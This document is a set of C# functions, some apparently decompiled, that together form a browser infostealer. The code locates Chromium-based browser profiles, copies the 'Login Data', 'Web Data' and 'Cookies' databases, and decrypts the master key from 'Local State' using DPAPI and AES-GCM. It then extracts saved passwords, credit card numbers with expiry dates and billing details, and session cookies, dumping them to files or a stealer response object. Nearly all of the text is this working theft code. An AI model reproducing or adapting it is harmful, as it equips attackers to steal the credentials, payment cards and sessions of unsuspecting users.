// Token: 0x06000184 RID: 388 RVA: 0x0000AEAC File Offset: 0x000090AC public static void Get_CC(string profilePath, string Browser_Name, string Profile_Name) { try { SqlHandler sqlHandler = new SqlHandler(GetCookies.CreateTempCopy(Path.Combine(profilePath, "Web Data"))); sqlHandler.ReadTable("credit_cards"); int rowCount = sqlHandler.GetRowCount(); for (int i = 0; i < rowCount; i++) { Get_Credit_Cards.CCCouunt++; try { string @string = Encoding.UTF8.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 4)), null)); string value = sqlHandler.GetValue(i, 1); string value2 = sqlHandler.GetValue(i, 2); string value3 = sqlHandler.GetValue(i, 3); string value4 = sqlHandler.GetValue(i, 9); Get_Credit_Cards.CC.Add(string.Format("{0}\t{1}/{2}\t{3}\t{4}\r\n******************************\r\n", new object[] { value, value2, value3, @string, value4 })); } catch { } } foreach (string text in Get_Credit_Cards.CC) { Get_Credit_Cards.CC_List.Add(string.Concat(new string[] { "Browser : ", Browser_Name, Environment.NewLine, "Profie : ", Profile_Name, Environment.NewLine, text })); } Get_Credit_Cards.CC.Clear(); } catch { } }
public static void GetCards(string path2save) { try { List <string> Browsers = new List <string>(); List <string> BrPaths = new List <string> { Help.AppDate, Help.LocalData }; var APD = new List <string>(); foreach (var paths in BrPaths) { try { APD.AddRange(Directory.GetDirectories(paths)); } catch { } } foreach (var path in APD) { string result = ""; string[] files = null; try { Browsers.AddRange(Directory.GetFiles(path, "Web Data", SearchOption.AllDirectories)); files = Directory.GetFiles(path, "Web Data", SearchOption.AllDirectories); } catch { } if (files != null) { foreach (var file in files) { try { if (File.Exists(file)) { string str = "Unknown"; foreach (string name in BrowsersName) { if (path.Contains(name)) { str = name; } } string loginData = file; if (File.Exists(bd)) { File.Delete(bd); } File.Copy(loginData, bd); SqlHandler sqlHandler = new SqlHandler(bd); List <PassData> passDataList = new List <PassData>(); sqlHandler.ReadTable("credit_cards"); int rowCount = sqlHandler.GetRowCount(); for (int rowNum = 0; rowNum < rowCount; ++rowNum) { try { string Number = Encoding.UTF8.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(rowNum, 4)))), Name = sqlHandler.GetValue(rowNum, 1), Exp_m = sqlHandler.GetValue(rowNum, 2), Exp_y = sqlHandler.GetValue(rowNum, 3), Billing = sqlHandler.GetValue(rowNum, 9); result += string.Format("{0}\t{1}/{2}\t{3}\t{4}\r\n******************************\r\n", Name, Exp_m, Exp_y, Number, Billing); CC++; } catch { } } if (File.Exists(bd)) { File.Delete(bd); } if (File.Exists(ls)) { File.Delete(ls); } if (str == "Unknown") { File.AppendAllText(path2save + "\\" + "Cards_" + str + ".txt", result); } else { File.WriteAllText(path2save + "\\" + "Cards_" + str + ".txt", result); } } } catch { } } } } } catch { } }
public static void GetPasswordsOpera(string path2save) { try { List <string> Browsers = new List <string>(); List <string> BrPaths = new List <string> { Help.AppDate, Help.LocalData }; var APD = new List <string>(); foreach (var paths in BrPaths) { try { APD.AddRange(Directory.GetDirectories(paths)); } catch { } } foreach (var path in APD) { string[] files = null; string result = ""; try { Browsers.AddRange(Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories)); files = Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories); } catch { } if (files != null) { foreach (var file in files) { try { if (File.Exists(file)) { string str = "Unknown"; foreach (string name in BrowsersName) { if (path.Contains(name)) { str = name; } } string loginData = file; string localState = file + "\\..\\Local State"; if (File.Exists(bd)) { File.Delete(bd); } if (File.Exists(ls)) { File.Delete(ls); } File.Copy(loginData, bd); File.Copy(localState, ls); SqlHandler sqlHandler = new SqlHandler(bd); List <PassData> passDataList = new List <PassData>(); sqlHandler.ReadTable("logins"); string keyStr = File.ReadAllText(ls); string[] lines = Regex.Split(keyStr, "\""); int index = 0; foreach (string line in lines) { if (line == "encrypted_key") { keyStr = lines[index + 2]; break; } index++; } byte[] keyBytes = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(keyStr)).Remove(0, 5)); byte[] masterKeyBytes = DecryptAPI.DecryptBrowsers(keyBytes); int rowCount = sqlHandler.GetRowCount(); for (int rowNum = 0; rowNum < rowCount; ++rowNum) { try { string passStr = sqlHandler.GetValue(rowNum, 5); byte[] pass = Encoding.Default.GetBytes(passStr); string decrypted = ""; try { if (passStr.StartsWith("v10") || passStr.StartsWith("v11")) { byte[] iv = pass.Skip(3).Take(12).ToArray(); // From 3 to 15 byte[] payload = pass.Skip(15).ToArray(); decrypted = AesGcm256.Decrypt(payload, masterKeyBytes, iv); } else { decrypted = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(pass)); } } catch { } result += "Url: " + sqlHandler.GetValue(rowNum, 1) + "\r\n"; result += "Login: "******"\r\n"; result += "Passwords: " + decrypted + "\r\n"; result += "Browser: " + str + "\r\n\r\n"; Passwords++; } catch { } } if (File.Exists(bd)) { File.Delete(bd); } if (File.Exists(ls)) { File.Delete(ls); } if (str == "Unknown") { File.AppendAllText(path2save + "\\" + "Passwords_" + str + ".txt", result); } else { File.WriteAllText(path2save + "\\" + "Passwords_" + str + ".txt", result); } } } catch { } } } } } catch { } }
public static void GetCookies(string path2save) { try { List <string> Browsers = new List <string>(); List <string> BrPaths = new List <string> { Help.AppDate, Help.LocalData }; var APD = new List <string>(); foreach (var paths in BrPaths) { try { APD.AddRange(Directory.GetDirectories(paths)); } catch { } } foreach (var path in APD) { string result = ""; string[] files = null; try { Browsers.AddRange(Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories)); files = Directory.GetFiles(path, "Cookies", SearchOption.AllDirectories); } catch { } if (files != null) { foreach (var file in files) { try { if (File.Exists(file)) { string str = "Unknown"; foreach (string name in BrowsersName) { if (path.Contains(name)) { str = name; } } string loginData = file; string localState = file + "\\..\\..\\Local State"; if (File.Exists(bd)) { File.Delete(bd); } if (File.Exists(ls)) { File.Delete(ls); } File.Copy(loginData, bd); File.Copy(localState, ls); SqlHandler sqlHandler = new SqlHandler(bd); List <PassData> passDataList = new List <PassData>(); sqlHandler.ReadTable("cookies"); string keyStr = File.ReadAllText(ls); string[] lines = Regex.Split(keyStr, "\""); int index = 0; foreach (string line in lines) { if (line == "encrypted_key") { keyStr = lines[index + 2]; break; } index++; } byte[] keyBytes = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(keyStr)).Remove(0, 5)); byte[] masterKeyBytes = DecryptAPI.DecryptBrowsers(keyBytes); int rowCount = sqlHandler.GetRowCount(); for (int rowNum = 0; rowNum < rowCount; ++rowNum) { try { string valueStr = sqlHandler.GetValue(rowNum, 12); byte[] value = Encoding.Default.GetBytes(valueStr); string decrypted = ""; try { if (valueStr.StartsWith("v10")) { // Console.WriteLine("!=============== AES 256 GCM COOKIES ============!"); byte[] iv = value.Skip(3).Take(12).ToArray(); // From 3 to 15 byte[] payload = value.Skip(15).ToArray(); decrypted = AesGcm256.Decrypt(payload, masterKeyBytes, iv); } else { decrypted = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(value)); } string host_key = sqlHandler.GetValue(rowNum, 1), name = sqlHandler.GetValue(rowNum, 2), PATH = sqlHandler.GetValue(rowNum, 4), expires_utc = sqlHandler.GetValue(rowNum, 5), secure = sqlHandler.GetValue(rowNum, 6); result += string.Format("{0}\tFALSE\t{1}\t{2}\t{3}\t{4}\t{5}\r\n", host_key, PATH, secure.ToUpper(), expires_utc, name, decrypted); Cookies++; } catch { } } catch { } } if (File.Exists(bd)) { File.Delete(bd); } if (File.Exists(ls)) { File.Delete(ls); } if (str == "Unknown") { File.AppendAllText(path2save + "\\" + "Cookies_" + str + ".txt", result); } else { File.WriteAllText(path2save + "\\" + "Cookies_" + str + ".txt", result); } } } catch { } } } } } catch { } }
// Token: 0x06000181 RID: 385 RVA: 0x0000A704 File Offset: 0x00008904 public static void Passwords_Grab(string profilePath, string browser_name, string profile) { try { Path.Combine(profilePath, "Login Data"); GetPasswords.browser_name_list.Add(browser_name); GetPasswords.profile_list.Add(profile); List <string> list = new List <string>(); string appDate = Helper.AppDate; string localData = Helper.LocalData; List <string> list2 = new List <string>(); list2.Add(appDate); list2.Add(localData); List <string> list3 = new List <string>(); foreach (string path in list2) { try { list3.AddRange(Directory.GetDirectories(path)); } catch { } } foreach (string text in list3) { string[] array = null; try { list.AddRange(Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories)); array = Directory.GetFiles(text, "Login Data", SearchOption.AllDirectories); } catch { } if (array != null) { foreach (string text2 in array) { try { if (File.Exists(text2)) { string text3 = "Unknown"; foreach (string text4 in GetPasswords.BrowsersName) { if (text.Contains(text4)) { text3 = text4; } } string sourceFileName = text2; string sourceFileName2 = text2 + "\\..\\..\\Local State"; if (File.Exists(GetPasswords.bd)) { File.Delete(GetPasswords.bd); } if (File.Exists(GetPasswords.ls)) { File.Delete(GetPasswords.ls); } File.Copy(sourceFileName, GetPasswords.bd); File.Copy(sourceFileName2, GetPasswords.ls); SqlHandler sqlHandler = new SqlHandler(GetPasswords.bd); new List <GetPasswords.PassData>(); sqlHandler.ReadTable("logins"); string text5 = File.ReadAllText(GetPasswords.ls); string[] array4 = Regex.Split(text5, "\""); int num = 0; string[] array3 = array4; for (int j = 0; j < array3.Length; j++) { if (array3[j] == "encrypted_key") { text5 = array4[num + 2]; break; } num++; } byte[] key = DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(text5)).Remove(0, 5)), null); int rowCount = sqlHandler.GetRowCount(); for (int k = 0; k < rowCount; k++) { try { string value = sqlHandler.GetValue(k, 5); byte[] bytes = Encoding.Default.GetBytes(value); string text6 = ""; try { if (value.StartsWith("v10") || value.StartsWith("v11")) { byte[] iv = bytes.Skip(3).Take(12).ToArray <byte>(); text6 = AesGcm256.Decrypt(bytes.Skip(15).ToArray <byte>(), key, iv); } else { text6 = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(bytes, null)); } } catch { } GetPasswords.credential.Add(string.Concat(new string[] { "Site_Url : ", sqlHandler.GetValue(k, 1).Trim(), Environment.NewLine, "Login : "******"Password : "******"Browser : ", text3, Environment.NewLine, "Profile : ", profile, Environment.NewLine, text7 })); } GetPasswords.credential.Clear(); } } catch { } } } } } catch { } }
private StealerResponce GetPasswordsOpera() { List <StealerResponce.Password> passwords = new List <StealerResponce.Password>(); try { string bd = Path.GetTempPath() + "\\bd" + "62362712467" + ".tmp"; string ls = Path.GetTempPath() + "\\ls" + "62362712467" + ".tmp"; List <string> Browsers = new List <string>(); List <string> BrPaths = new List <string> { Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), }; var APD = new List <string>(); foreach (var paths in BrPaths) { try { APD.AddRange(Directory.GetDirectories(paths)); } catch { } } foreach (var path in APD) { string[] files = null; string result = ""; try { Browsers.AddRange(Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories)); files = Directory.GetFiles(path, "Login Data", SearchOption.AllDirectories); } catch { } if (files != null) { foreach (var file in files) { try { if (File.Exists(file)) { string str = "Unknown"; foreach (string name1 in BrowsersNames) { string name = crypter.Decypt(name1, "NekiS"); if (path.Contains(name)) { str = name; } } string loginData = file; string localState = file + "\\..\\Local State"; if (File.Exists(bd)) { File.Delete(bd); } if (File.Exists(ls)) { File.Delete(ls); } File.Copy(loginData, bd); File.Copy(localState, ls); SqlHandler sqlHandler = new SqlHandler(bd); sqlHandler.ReadTable("logins"); string keyStr = File.ReadAllText(ls); string[] lines = Regex.Split(keyStr, "\""); int index = 0; foreach (string line in lines) { if (line == "encrypted_key") { keyStr = lines[index + 2]; break; } index++; } byte[] keyBytes = Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(keyStr)).Remove(0, 5)); byte[] masterKeyBytes = DecryptAPI.DecryptBrowsers(keyBytes); int rowCount = sqlHandler.GetRowCount(); for (int rowNum = 0; rowNum < rowCount; ++rowNum) { try { string passStr = sqlHandler.GetValue(rowNum, 5); byte[] pass = Encoding.Default.GetBytes(passStr); string decrypted = ""; try { if (passStr.StartsWith("v10") || passStr.StartsWith("v11")) { byte[] iv = pass.Skip(3).Take(12).ToArray(); // From 3 to 15 byte[] payload = pass.Skip(15).ToArray(); decrypted = AesGcm256.Decrypt(payload, masterKeyBytes, iv); } else { decrypted = Encoding.Default.GetString(DecryptAPI.DecryptBrowsers(pass)); } } catch { } string url = sqlHandler.GetValue(rowNum, 1).Trim(new char[] { ' ', '\n' }); string login = sqlHandler.GetValue(rowNum, 3).Trim(new char[] { ' ', '\n' }); string password = decrypted.Trim(new char[] { ' ', '\n' }); if (!string.IsNullOrEmpty(url) && !string.IsNullOrEmpty(login) && !string.IsNullOrEmpty(password)) { StealerResponce.Password passwordresult = new StealerResponce.Password(); //Console.WriteLine(sqlHandler.GetValue(rowNum, 1) + "\r"); passwordresult.url = url; //Console.WriteLine(sqlHandler.GetValue(rowNum, 3) + "\r"); passwordresult.login = login; //Console.WriteLine(decrypted + "\r"); passwordresult.password = password; passwordresult.browser = str; //Console.WriteLine(); passwords.Add(passwordresult); } } catch { } } } } catch { } } if (File.Exists(bd)) { File.Delete(bd); } if (File.Exists(ls)) { File.Delete(ls); } } } } catch { } return(new StealerResponce() { Passwords = passwords, }); }